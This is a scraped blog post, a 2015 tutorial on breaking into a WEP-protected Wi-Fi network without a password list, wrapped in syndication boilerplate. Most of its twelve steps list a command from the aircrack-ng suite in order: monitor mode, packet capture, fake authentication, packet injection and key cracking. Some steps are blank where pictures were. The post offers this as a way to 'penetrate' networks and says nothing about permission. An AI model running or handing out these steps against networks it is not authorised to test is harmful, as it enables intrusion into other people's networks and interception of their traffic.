Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

Hacking WEP WIFI Without Dictionary(Only Pictures)

This tutorial will guide you to penetrate a wireless network protected by WEP key without using a password list/dictionary. This comprehensive guide with 12 simple steps(Pictures Only) can be used on any Linux based system(preferably BackTrack.)
More Tutorials on hacking Wireless Networks:
Hacking WEP Wireless Network using Backtrack.
Hacking WEP Wireless Network using FERN WIFI Cracker(GUI based).
Hacking WPA/WPA2 Wireless Network.

Step 1:
Command Used: iwconfig

Step 2:
Command Used: airmon-ng

Step 3:
Command Used: airmon-ng start wlan0

Step 4:
Command Used: airodump-ng mon0

Step 5:
Command Used: airodump-ng -c 11 - w cracking --bssid [bssid]

Step 6:


Step 7:
Command Used: aireplay-ng -1 0 -a [bssid] mon0

Step 8:
Command Used: aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [bssid] mon0

Step 9:


Step 10:


Step 11:
Command Used: aircrack-ng cracking-01.cap

Step 12:


Copyright UberTechBlog 2015 at http://www.ubertechblog.com


This post first appeared on UberTechBlog, please read the originial post: here

Share the post

Hacking WEP WIFI Without Dictionary(Only Pictures)

×

Subscribe to Ubertechblog

Get updates delivered right to your inbox!

Thank you for your subscription

×